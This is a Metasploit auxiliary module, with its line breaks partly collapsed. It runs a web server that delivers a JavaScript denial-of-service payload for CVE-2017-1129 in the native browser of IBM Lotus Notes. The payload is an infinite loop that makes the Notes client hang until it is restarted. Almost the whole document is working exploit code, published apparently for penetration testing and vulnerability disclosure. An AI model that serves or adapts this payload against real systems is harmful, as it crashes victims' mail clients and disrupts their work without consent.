### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,'Name' => "IBM Notes encodeURI DOS",'Description'=> %q(
This module exploits a vulnerability in the native browser that
comes with IBM Lotus Notes.If successful, it could cause the Notes client to hang and have
to be restarted.),'License'=> MSF_LICENSE,'Author' => ['Dhiraj Mishra',],'References' => [['EXPLOIT-DB','42602'],['CVE','2017-1129'],['URL','
http://www-01.ibm.com/support/docview.wss?uid=swg21999385']],'DisclosureDate' => 'Aug 31 2017','Actions'=> [['WebServer']],'PassiveActions' => ['WebServer'],'DefaultAction'=> 'WebServer'))end
def run
exploit # start http serverend
def setup
@html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while(true)try{var object = {};function d(d0){var d0 = (object instanceof encodeURI)('foo');}
d(75);}catch(d){}
</script>
</head></html>
|end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)endend
